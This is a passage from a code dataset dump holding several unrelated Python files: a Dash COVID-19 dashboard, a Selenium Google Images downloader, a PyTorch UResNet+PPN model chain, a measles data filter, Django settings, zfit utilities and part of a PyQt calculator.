= 'COVID-19@INDIA'\nserver= app.server\n##################################################################################\n##################################################################################\napp.layout= html.Div([\n \n html.Div([\n ##########################################################################\n ###################### temp header ######################\n ##########################################################################\n html.Div([\n html.H3(html.B(['COVID-19'], style= {'color': '#fff'})),\n dcc.Dropdown(id= 'state', options= states, clearable= False,\n value= states[n-1]['value'], optionHeight= 50),\n \n ], className='d-none d-sm-block', style= {'width': '16%', 'display': 'inline-block',\n 'text-align': 'left', 'color': '#000', 'padding-left': '2%'}),\n html.Div([\n html.H3(html.B('COVID-19@INDIA'))\n ], className= 'col-12 d-block d-sm-none', style= {'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n ##########################################################################\n html.Div([\n html.H3(html.B(id= 'cnfr')),\n html.H5('confirmed')\n ], className='col-md-2 col-6 d-block d-sm-none', style= {'display': 'inline-block',\n 'text-align': 'left', 'color': '#fff'}),\n html.Div([\n html.H3(html.B(id= 'cnfrm')),\n html.H5('confirmed')\n ], className='d-none d-sm-block', style= {'width': '11%', 'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n ##########################################################################\n html.Div([\n html.H3(html.B(r)),\n html.H5('recovered')\n ], className='col-md-2 col-6 d-block d-sm-none', style= {'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n html.Div([\n html.H3(html.B(id= 'rcvr')),\n html.H5('recovered')\n ], className='d-none d-sm-block', style= {'width': '12%', 'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n ##########################################################################\n html.Div([\n html.H3(html.B(id= 'dth1')),\n html.H5('deceased')\n ], className='col-md-2 col-6 d-block d-sm-none', style= {'display': 'inline-block',\n 'text-align': 'left', 'color': '#fff'}),\n html.Div([\n html.H3(html.B(id= 'dth')),\n html.H5('deceased')\n ], className='d-none d-sm-block', style= {'width': '12%', 'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n ##########################################################################\n html.Div([\n html.H3(html.B(n)), \n html.H5('states')\n ], className='col-md-2 col-6 d-block d-sm-none', style= {'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n html.Div([\n html.H3(html.B(id= 'stts')), \n html.H5(id= 'stt')\n ], className='d-none d-sm-block', style= {'width': '8%', 'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}),\n ########################################################################## \n html.Div([\n html.Div([\n dcc.Dropdown(id= 'helpdd1', options= hnames, clearable= False,\n value= hnames[0]['value'], )\n ], style= {'width': '45%', 'display': 'inline-block', 'padding-bottom': '2%',\n 'color': '#000'}),\n html.Div([ \n html.H3(html.B(id= 'hname1', className= 'd-none d-sm-block')),\n html.H6(updt),\n ], style= {'width': '55%', 'padding-left': '6%',\n 'display': 'inline-block', 'text-align': 'left'})\n ], className='d-none d-sm-block', style= {'width': '40%', 'display': 'inline-block', 'padding-left': '2%',\n 'text-align': 'left', 'color': '#fff'}),\n html.Div([\n html.Div([dcc.Dropdown(id= 'helpdd2', options= hnames, \n value= hnames[0]['value'], clearable= False)],\n className='col-6 d-block d-sm-none',\n style= {'display': 'flex', 'align-items': 'right',\n 'justify-content': 'right', 'display': 'inline-block'}),\n html.Div([html.H3(html.B(id= 'hname2'))], className='col-md-2 col-6 d-block d-sm-none',\n style= {'display': 'inline-block',\n 'text-align': 'right', 'color': '#fff'}) \n ], className= 'row', style= {'padding-left': '5%', 'text-align': 'right', 'color': 'rgb(0, 74, 140)'}),\n ], className= 'navbar navbar-dark',\n style= {'padding-left': '3%', 'width': '100%', 'padding-top': '1%',\n 'background': 'rgb(0, 74, 140)'}), \n ########################## Header ends here ##########################\n html.Div([\n html.Div([\n \n dcc.Tabs(value='tab3', children=[ \n \n dcc.Tab(label= 'stats', value= 'tab3', children= [\n html.Div([\n html.Iframe(id= 'smap', height= '420', width= '100%',\n style= {'border': 'None'})\n ], style= {'width': '43%', 'display': 'inline-block',\n 'padding-top': '1%'}),\n html.Div([], style= {'width': '2%', 'display': 'inline-block',\n 'padding-top': '1%'}),\n html.Div([ \n html.Div([\n html.Div([\n html.H2(html.B(id= 'pop'), style= {}),\n html.H6('population')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'cp'), style= {}),\n html.H6('confirmed %')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'rp'), style= {}),\n html.H6('recovered %')\n ], className= 'rounded-lg',\n style= {'width': '24%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'dp')),\n html.H6('death %')\n ], className= 'rounded-lg',\n style= {'width': '23%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n html.Div(style= {'width': '1%', 'display': 'inline-block'}), \n ], style= {'width': '100%'}),\n \n html.Div([\n html.Div([\n html.H2(html.B(id= 'tes')),\n html.H6('total tested')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'neg')),\n html.H6('tested negative')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'pos')),\n html.H6('tested positive')\n ], className= 'rounded-lg',\n style= {'width': '24%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'uncn')),\n html.H6('unconfirmed')\n ], className= 'rounded-lg',\n style= {'width': '23%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n \n ], style= {'width': '100%',}),\n \n html.Div([\n \n html.Div([\n html.H2(html.B('19023')),\n html.H6('ventilators')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(tnidf.tail(1)['Total Samples Tested'])),\n html.H6('samples tested')\n ], className= 'rounded-lg',\n style= {'width': '25%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n html.Div(style= {'width': '1%', 'display': 'inline-block'}), \n html.Div([\n html.H2(html.B(id= 'tpr')),\n html.H6('positivity rate')\n ], className= 'rounded-lg',\n style= {'width': '24%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}),\n html.Div(style= {'width': '1%', 'display': 'inline-block'}),\n html.Div([\n html.H2(html.B(id= 'tpt')),\n html.H6('tests per 1000')\n ], className= 'rounded-lg',\n style= {'width': '23%', 'display': 'inline-block',\n 'text-align': 'right', 'background': 'rgb(0, 74, 140)',\n 'color': '#fff', 'padding-right': '1%'}), \n \n \n \n ], style= {'width': '100%', 'padding-top': '4%'}), \n html.Div([\n html.Div([\n html.H3(html.B('central helpline: +91-11-23978046'))\n ], style= {'width': '100%', 'display': 'inline-block',\n 'text-align': 'right',}),\n html.Div([\n html.H3(html.B('email helpline: ncov2019@gov.in'))\n ], style= {'width': '100%', 'display': 'inline-block',\n 'text-align': 'right',}),\n html.Div([\n html.H3(html.B('state helpline: 104'))\n ], style= {'width': '100%', 'display': 'inline-block',\n 'text-align': 'right',}),\n ], style= {'width': '100%', 'padding-top': '3%'})\n \n ], style= {'width': '55%', 'display': 'inline-block', 'align': 'justify',\n 'padding-top': '1%', 'color': 'rgb(0, 74, 140)'}) \n ], style=tab_style, selected_style=tab_selected_style),\n \n \n \n dcc.Tab(label='figures', value='tab1', children= [\n html.Div([\n html.Div([\n html.Div([\n html.Div([ \n dcc.Dropdown(id= 'tb', options= tb, value= 'Top',\n clearable= False, style= {'width': '100%'})\n ], style= {'display': 'inline-block'}),\n html.Div([\n dcc.Dropdown(id= 'sn', options= nos, value= 3,\n clearable= False, )\n ], style= {'display': 'inline-block'})\n ], style= {'display': 'inline-block', 'padding-left': '10%'}), \n html.Div([html.H4('states affected',\n style= {'padding-bottom': '3%', 'color': 'rgb(0, 74, 140)'})],\n style= {'display': 'inline-block', 'padding-left': '3%'})\n ], style= {'padding-left': '25%'}),\n dcc.Graph(id= 'Bar1', config= {'displayModeBar': False})\n ], style= {'padding-top': '1%', 'width': '100%', \n 'padding-left': '5%'},)\n ], style=tab_style, selected_style=tab_selected_style),\n \n \n \n dcc.Tab(label='trends', value='tab2', children= [\n html.Div([\n html.Div([\n html.Div([ \n html.Div([html.H4('epidemic curve between',\n style= {'color': 'rgb(0, 74, 140)'})],\n style= {'display': 'inline-block',\n 'padding-left': '3%'}),\n html.Div([ \n dcc.Dropdown(id= 'dt1', options= dates,\n value= dates[0]['value'], clearable= False)\n ], style= {'display': 'inline-block', 'padding-left': '2%',\n 'width': '15%'}),\n html.Div([html.H4('and',\n style= {'padding-bottom': '2%',\n 'color': 'rgb(0, 74, 140)'})],\n style= {'display': 'inline-block',\n 'padding-left': '2%'}),\n \n html.Div([\n dcc.Dropdown(id= 'dt2', options= dates,\n value= dates[-1]['value'], clearable= False)\n ], style= {'display': 'inline-block', 'padding-left': '2%',\n 'width': '15%'}),\n \n html.Div([html.H4('(cumulative',\n style= {'padding-bottom': '2%', 'padding-top': '2%',\n 'color': 'rgb(0, 74, 140)'})],\n style= {'display': 'inline-block',\n 'padding-left': '3%'}),\n \n html.Div([\n daq.ToggleSwitch(id= 'ts', value= False, \n color=\"rgb(0, 74, 140)\", size= 40)\n ], style= {'display': 'inline-block', 'padding-left': '2%',\n }),\n \n html.Div([html.H4('daily)',\n style= {'padding-bottom': '2%',\n 'color': 'rgb(0, 74, 140)'})],\n style= {'display': 'inline-block',\n 'padding-left': '2%'}),\n ]), \n ], style= {'padding-left': '3%', }),\n dcc.Graph(id= 'Line1', config= {'displayModeBar': False})\n ], style= {'padding-top': '1%', 'width': '100%', 'padding-left': '3%'}, )\n ], style=tab_style, selected_style=tab_selected_style),\n \n ], style= tabs_style,\n colors={ 'border': 'rgba(0, 74, 140, 0)', 'primary': 'rgba(0, 74, 140, 1)',\n \"background\": \"rgba(0,0,0,0)\"},),\n ]), \n ], style= {'width': '95%', 'padding-left': '5%', 'padding-top': '02%'}) \n], style= {'fontFamily': 'Helvetica', 'height': '100v', 'padding-bottom': '5%',\n 'background': 'linear-gradient(to bottom, rgba(99, 212, 230, 0) 0%, rgba(99, 212, 230, 1) 100%)'})\n##################################################################################\n@app.callback(Output('cnfrm', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return df.loc[val]['Confirmed']\n##########################################\n@app.callback(Output('cp', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return round((df.loc[val]['Confirmed']/stndd.loc[val]['Population NCP 2019 Projection'])*100, 5)\n##########################################\n@app.callback(Output('rp', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return round((df.loc[val]['Recovery']/df.loc[val]['Confirmed'])*100, 2)\n##########################################\n@app.callback(Output('rcvr', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return df.loc[val]['Recovery']\n##########################################\n@app.callback(Output('dp', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return round((df.loc[val]['Death']/df.loc[val]['Confirmed'])*100, 2)\n##########################################\n@app.callback(Output('dth', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return df.loc[val]['Death']\n##########################################\n##########################################\n@app.callback(Output('tes', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return stndd.loc[val]['Total Tested']\n##########################################\n@app.callback(Output('pos', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return stndd.loc[val]['Positive']\n##########################################\n@app.callback(Output('neg', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return stndd.loc[val]['Negative']\n##########################################\n@app.callback(Output('uncn', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return stndd.loc[val]['Unconfirmed']\n##########################################\n@app.callback(Output('pop', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n p= round(stndd.loc[val]['Population NCP 2019 Projection']/1000000000, 3)\n p= str(p) + 'b'\n return p\n##########################################\n##########################################\n@app.callback(Output('tpr', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return stndd.loc[val]['Test positivity rate']\n##########################################\n##########################################\n@app.callback(Output('tpt', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n return round(stndd.loc[val]['Tests per thousand'], 2)\n##########################################\n@app.callback(Output('stts', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n if val=='India':\n return n\n pos= '#' + str(df_d.index.get_loc(val) + 1)\n return pos\n##########################################\n@app.callback(Output('stt', 'children'),\n [Input('state', 'value')])\ndef get_confirm(val):\n if val=='India':\n return 'states'\n return 'state'\n##########################################\n##########################################\n@app.callback(Output('hname1', 'children'),\n [Input('helpdd1', 'value')])\ndef update_hname(val):\n for i in range(len(hphone)):\n if hphone[i]['label']==val:\n return hphone[i]['value'] \n########################################## \n@app.callback(Output('hname2', 'children'),\n [Input('helpdd2', 'value')])\ndef update_hname(val):\n for i in range(len(hphone)):\n if hphone[i]['label']==val:\n return hphone[i]['value'] \n##########################################\n#@app.callback(Output('hmail', 'children'),\n# [Input('helpdd1', 'value')])\n#def update_hmail(val):\n# for i in range(len(hloc)):\n# if hloc[i]['label']==val:\n# return hloc[i]['value'] \n##########################################\n@app.callback(Output('smap', 'srcDoc'),\n [Input('state', 'value')])\ndef render_smap(state):\n state= 'states/'+state+'.html'\n return open(state, 'r').read()\n##########################################\n@app.callback(Output('Bar1', 'figure'),\n [Input('tb', 'value'), Input('sn', 'value')])\ndef update_bar(tb, sn):\n return form_bar(tb, sn)\n##########################################\n@app.callback(Output('Line1', 'figure'),\n [Input('dt1', 'value'), Input('dt2', 'value'), Input('ts', 'value')])\ndef update_bar(dt1, dt2, ts):\n if (ts):\n return get_dts(dt1, dt2)\n return get_cts(dt1, dt2)\n##################################################################################\nif __name__=='__main__':\n app.run_server()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":36448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614266819","text":"from time import sleep\nfrom urllib.error import HTTPError\nfrom urllib.request import urlretrieve\n\nimport pandas as pd\nfrom openpyxl import load_workbook\nfrom selenium import webdriver\n\n\ndef add_data_to_excel(d_images, cell_letters, is_photo):\n try:\n for cell_letter in cell_letters:\n if is_photo:\n key = 'Image {column_image_number}'.format(column_image_number = cell_letters.index(cell_letter) + 1)\n else:\n key = 'Image {column_image_number} Link'.format(\n column_image_number = cell_letters.index(cell_letter) + 1)\n\n column_rows = d_images[key]\n\n df_new = pd.DataFrame.from_records({key: column_rows})\n\n wb = load_workbook('table.xlsx')\n\n ws = wb['Sheet1']\n\n for cell_row_number, row in df_new.iterrows():\n cell = '%(column_letter)s%(cell_row_number)s' % dict(column_letter = cell_letter,\n cell_row_number = cell_row_number + 2)\n ws[cell] = row[0]\n\n wb.save('table.xlsx')\n except:\n print('WARNING!! Data NOT written to Excel. Make sure you keep your workbook CLOSED!')\n\n\nclass GoogleBot:\n def __init__(self, query, file_base, delay, number_of_images, down_images, main_index, link_i):\n # Activating the Chrome Driver\n self.link_index = link_i\n self.filename = ''\n self.driver = webdriver.Chrome()\n url = 'https://www.google.com/search?q={q}'.format(q = query)\n\n # Navigating to the Google Search for particular product\n self.driver.get(url)\n\n # Navigating to the Google Images tab\n self.driver.find_element_by_xpath(\n '//*[@id=\"hdtb-msb-vis\"]/div[2]/a') \\\n .click()\n\n sleep(delay)\n\n self.thumbnails_xpath = []\n\n # Adding the x paths of the thumbnails to the list\n for ind in range(number_of_images):\n self.thumbnails_xpath.append(\n '//*[@id=\"islrg\"]/div[1]/div[{index}]/a[1]/div[1]/img'.format(index = ind + 1))\n\n self.larger_image_xpath = '//*[@id=\"Sva75c\"]/div/div/div[3]/div[2]/div/div[1]/div[1]/div/div[2]/a/img'\n\n # Downloading the images\n for idx in range(number_of_images):\n self.image_download(delay = delay, file_base = file_base, query = query,\n thumbnail = self.thumbnails_xpath[idx],\n image = self.larger_image_xpath,\n image_index = idx + 1,\n d_load_images = down_images,\n m_index = main_index)\n photo_cells = ['B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J']\n add_data_to_excel(d_images = down_images, cell_letters = photo_cells, is_photo = True)\n \n self.driver.close()\n\n def image_download(self, delay, file_base, query, thumbnail, image, image_index, d_load_images, m_index,\n lnk_index):\n\n def excel_add_data_when_no_error():\n key = 'Image %(column_image_number)s' % dict(column_image_number = image_index)\n d_load_images[key].insert(m_index, self.filename)\n\n def excel_add_na_when_error():\n key_err = 'Image %(column_image_number)s' % dict(column_image_number = image_index)\n d_load_images[key_err].insert(m_index, 'n/a')\n\n try:\n # Navigating to the 1st thumbnail of the search and CLICKing in it\n self.driver.find_element_by_xpath(thumbnail) \\\n .click()\n sleep(delay)\n\n # Finding the larger image and assigning its tag to the img variable\n img = self.driver.find_element_by_xpath(image)\n\n # Getting the URL out the img attribute\n src = img.get_attribute('src')\n\n self.filename = file_base + '{image_index}.jpg'.format(image_index = image_index)\n\n # Downloading the (bigger) image and storing it locally\n urlretrieve(src, self.filename)\n except FileNotFoundError as err:\n excel_add_na_when_error()\n print(err) # something wrong with local path\n except HTTPError as err:\n excel_add_na_when_error()\n except:\n excel_add_na_when_error()\n\n # something unexpected went wrong\n print(\n 'Unknown Error Image {image_index} - {q}'.format(q = query, image_index = image_index))\n\n else:\n print(lnk_index)\n # Adding filename to download_images to be saved in Excel\n excel_add_data_when_no_error()\n # Letting the user know that the 1st image of the first product has been downloaded\n print('{q} - {filename} downloaded'.format(q = query, filename = self.filename))\n\n\nprint('========================================================================')\nprint('| Google_Bot 1.0.1.4 by Allex Radu [www.ATFR.net] |')\nprint('| Get the latest version at https://github.com/allexradu/gBot |')\nprint('========================================================================')\nprint('| Instructions: Save your Excel Workbook as \"a.xls\" and place it in |')\nprint('| the same folder as this file, make sure the file in not opened. |')\nprint('========================================================================')\nprint('| WARNING!!! WRITE THIS DOWN! To stop the bot press CTRL + C |')\nprint('========================================================================')\n\nno_of_images = 0\n\nlink_index = 0\n\ndownloaded_images = {'Image 1': [''], 'Image 2': [''], 'Image 3': [''], 'Image 4': [''],\n 'Image 5': [''], 'Image 6': [''], 'Image 7': [''], 'Image 8': [''], 'Image 9': [''],\n 'Image 1 Link': [], 'Image 2 Link': [], 'Image 3 Link': [], 'Image 4 Link': [], 'Image 5 Link': [],\n 'Image 6 Link': [], 'Image 7 Link': [], 'Image 8 Link': [], 'Image 9 Link': []}\n\nwhile True:\n try:\n no_of_images = int(input('Number of images per product [1-9]: '))\n except:\n print('Invalid Input!!! Try again!')\n else:\n if not (0 < no_of_images <= 9):\n print('Number not in range, try again!!')\n continue\n else:\n break\n\nwhile True:\n try:\n seconds_delay = float(input('Number of seconds delay from one image to another: ' +\n '\\n (the slower the computer / connection the higher the number)' +\n '\\n [Minimum 1 sec recommended] seconds: '))\n except:\n print('Invalid Input!!! Try again!')\n else:\n break\n\n# Reading first column of a local excel file\ntry:\n df = pd.read_excel('a.xls', sheet_name = 0)\n print('Excel Read Complete!')\n\n product_names = df['Name'].tolist()\n\n for i in range(len(product_names)):\n print(product_names[i])\n\n # Placing all the product names in a list\n\n for i in range(len(product_names)):\n if i == 0:\n link_index = 2\n else:\n link_index = i + 1\n file_name_base = 'A' + '{num}'.format(num = (100 + i))\n product_name = product_names[i]\n GoogleBot(product_name, file_name_base, seconds_delay, no_of_images, downloaded_images, i, link_index)\nexcept:\n print('Excel File NOT READ. Name your file \"a.xls\" with the first column \"Name\"')\n print('and place it in the same directory and the bot file.')\n","sub_path":"scrach/bk.py","file_name":"bk.py","file_ext":"py","file_size_in_byte":7543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439864320","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport torch\nfrom mlreco.models.uresnet_lonely import UResNet, SegmentationLoss\nfrom mlreco.models.ppn import PPN, PPNLoss\n\n\nclass Chain(torch.nn.Module):\n \"\"\"\n Run UResNet and use its encoding/decoding feature maps for PPN layers\n \"\"\"\n def __init__(self, model_config):\n super(Chain, self).__init__()\n self.ppn = PPN(model_config)\n self.uresnet_lonely = UResNet(model_config)\n\n def forward(self, input):\n point_cloud, label = input\n x = self.uresnet_lonely((point_cloud,))\n y = self.ppn((label, x[0][0], x[1][0], x[2][0]))\n return [x[0]] + y\n\n\nclass ChainLoss(torch.nn.modules.loss._Loss):\n \"\"\"\n Loss for UResNet + PPN chain\n \"\"\"\n def __init__(self, cfg):\n super(ChainLoss, self).__init__()\n self.uresnet_loss = SegmentationLoss(cfg)\n self.ppn_loss = PPNLoss(cfg)\n\n def forward(self, segmentation, label, particles):\n uresnet_res = self.uresnet_loss([segmentation[0]], label)\n ppn_res = self.ppn_loss(segmentation[1:], label, particles)\n res = { **ppn_res, **uresnet_res }\n res['uresnet_acc'] = uresnet_res['accuracy']\n res['uresnet_loss'] = uresnet_res['loss_seg']\n # Don't forget to sum all losses\n res['loss_seg'] = ppn_res['loss_ppn1'].float() + ppn_res['loss_ppn2'].float() + \\\n ppn_res['loss_class'].float() + ppn_res['loss_distance'].float() \\\n + uresnet_res['loss_seg'].float()\n return res\n","sub_path":"mlreco/models/uresnet_ppn_chain.py","file_name":"uresnet_ppn_chain.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"423900598","text":"# PROJECT 02 - PART A\n\n# This program is the work product of Group 11 BSE 1\n# GROUP 11 MEMBERS\n# 1. NIWAGABA CLEVER 2020/BSE/055/PS\n# 2. AINEBYONA ALBERT 2020/BSE/003/PS\n# 3. LEMI MANOAH JUNGO 2020/BSE/145/PS\n\ntry:\n # The program will always read from measles.txt\n file_handle = open('measles.txt')\n print(file_handle)\n\n # Program prompts the user for name of output file\n output_file = input(\"Enter name of output file: \")\n file_out = open(output_file, 'w')\n\n # Program prompts the user for the year\n year = input(\"Enter a year: \").lower()\n if len(year) > 4:\n print(\"Invalid entry for year\")\n quit()\n\n for line in file_handle:\n\n # Checking whether the year input is in the Year Field\n pyear = len(line)\n if year in line[pyear-5:]:\n file_out.write(line)\n elif year == 'all' or year == ' ':\n file_out.write(line)\n print(\"Check your output file: \", output_file)\n\nexcept:\n # If program is unable to open measles.txt file\n print(\"Unable to open specified file!!!\")\n quit()\n","sub_path":"src/project02/Project2_a.py","file_name":"Project2_a.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"52247830","text":"from .common import *\nimport django_heroku\nimport dj_database_url\n\nDEBUG = False\n\nALLOWED_HOSTS += [\n 'tutorportal.herokuapp.com',\n '127.0.0.1',\n]\n\nCORS_ORIGIN_WHITELIST = [\n 'https://tutorportal-web.herokuapp.com',\n]\n\nFRONTEND_POINT = {\n 'PROTOCOL': 'https',\n 'DOMAIN': 'tutorportal-web.herokuapp.com',\n}\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'name',\n 'USER': 'user',\n 'PASSWORD': '',\n 'HOST': 'host',\n 'PORT': '',\n }\n}\n\nFRONTEND_URL = '%s://%s' % (FRONTEND_POINT['PROTOCOL'], FRONTEND_POINT['DOMAIN'])\ndb_from_env = dj_database_url.config(conn_max_age=600, ssl_require=True)\nDATABASES['default'].update(db_from_env)\n\ndjango_heroku.settings(locals())\n","sub_path":"backend/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"154842803","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 22 09:46:38 2016\n\n@author: hyl\n\n@version: 0.1\n\n@since: python2.7.6\n\"\"\"\n\ndef SortByKey(dict):\n \"\"\"\n sort a dictionary by keys\n \"\"\"\n keys = dict.keys() # get the keys\n keys.sort() # sort keys\n return map(dict.get, keys)\n\nif __name__ == \"__main__\":\n inf = open(\"../original_data/User_Properties.txt\") # read user information file\n outf = open(\"../temporary_data/User_Properties_sorted.txt\", \"w\") # store the information after sort\n inputInfor = {} # store the read-in data\n\n for line in inf.readlines():\n perItem = line.split() # split every line by space\n inputInfor[perItem[0]] = perItem # get the dictionary of id(string) to infor(tuple)\n \n res = SortByKey(inputInfor) # get the sorted data in tuple\n \n for item in res:\n outf.write('\\t'.join(item) + '\\n') # output to the file\n \n outf.close()\n inf.close()","sub_path":"userID_sort.py","file_name":"userID_sort.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"549008362","text":"from contextlib import ExitStack\n\n\ndef eval_pdf(model, x, params):\n \"\"\" Compute pdf of model at a given point x and for given parameters values \"\"\"\n\n def _pdf(model, x):\n if model.is_extended:\n return model.pdf(x) * model.get_yield()\n else:\n return model.pdf(x)\n\n if \"zfit\" in str(model.__class__):\n import zfit\n pdf = lambda m, x: zfit.run(_pdf(m, x))\n else:\n pdf = _pdf\n\n with ExitStack() as stack:\n for param in model.get_dependents():\n value = params[param][\"value\"]\n stack.enter_context(param.set_value(value))\n return pdf(model, x)\n\n\ndef pll(minimizer, loss, pois) -> float:\n \"\"\" Compute minimum profile likelihood for given parameters values. \"\"\"\n with ExitStack() as stack:\n for p in pois:\n param = p.parameter\n stack.enter_context(param.set_value(p.value))\n param.floating = False\n minimum = minimizer.minimize(loss=loss)\n for p in pois:\n p.parameter.floating = True\n return minimum.fmin\n\n\ndef array2dataset(dataset_cls, obs, array, weights=None):\n \"\"\"\n dataset_cls: only used to get the class in which array/weights will be\n converted.\n \"\"\"\n\n if hasattr(dataset_cls, \"from_numpy\"):\n return dataset_cls.from_numpy(obs=obs, array=array, weights=weights)\n else:\n return dataset_cls(obs=obs, array=array, weights=weights)\n","sub_path":"skstats/hypotests/fitutils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441189585","text":"#41. Змінній t привласнити значення істина, якщо максимальний елемент\r\n#одновимірного масиву єдиний і не перевищує наперед заданого числа а.\r\n\r\n#Підготував Суханов Андрій Олександрович, 122Б\r\n\r\nimport numpy as np #Імпортуємо numpy.\r\n\r\nwhile True:\r\n while True:\r\n #Користувач вводить \"задане число\".\r\n try:\r\n a=int(input('Задайте будь-яке число: '))\r\n except ValueError:\r\n print('Input numbers!! ')\r\n break\r\n\r\n print()\r\n #Ініціалізуємо масив нулями.\r\n A=np.zeros(8, dtype=int)\r\n\r\n t=False #Змінній t поки привласнимо значення False.\r\n count=0\r\n for i in range(len(A)): #Отримуємо доступ до елементів матриці А.\r\n try: #Перевірка на входження чисел.\r\n A[i] =int(input('Введіть елементи масиву: '))\r\n continue\r\n except ValueError:\r\n print('Input numbers!! ')\r\n break\r\n\r\n A_max=max(A) #Знайдемо максимальне значення масиву.\r\n \r\n if A[i]==A_max:\r\n count+=1 #Перевірка чи єдиний цей максимальний елемент у масиві.\r\n if A_max= buttonPad['columns']:\n c = 0; r += 1\n\n # Layout\n mainLayout = QGridLayout()\n mainLayout.setSizeConstraint(QLayout.SetFixedSize)\n\n mainLayout.addWidget(self.display, 0, 0, 1, 2)\n mainLayout.addLayout(numLayout, 1, 0)\n mainLayout.addLayout(opLayout, 1, 1)\n mainLayout.addLayout(constLayout, 2, 0)\n mainLayout.addLayout(funcLayout, 2, 1)\n\n self.setLayout(mainLayout)\n\n self.setWindowTitle(\"My Calculator\")\n\n\n def buttonClicked(self):\n if 'clear' in init:\n self.display.clear()\n init.clear()\n\n button = self.sender()\n key = button.text()\n\n ## 06 + 3처럼 앞에 0이 있을 경우 에러처리가 나던 것을 처리하기 위해\n ## 맨앞에 0이 나타나지 않을때까지 0을 지우고 연산기호 뒤의 문자도 0이면 없애는 식으로 하려했으나\n ## 연산기호를 여러번 쓰는부분을 어떻게 코딩해야할지 몰라 남겼습니다.\n '''idx = 0\n if key == '=':\n if '+' or '-' or '*' or '/' in self.display.text():\n del0 = ''\n for i in range(1, len(self.display.text())):\n # 연산기호가 몇번째에 있는 지 확인\n if self.display.text()[i] == '+':\n idx = i\n if self.display.text()[i] == '-':\n idx = i\n if self.display.text()[i] == 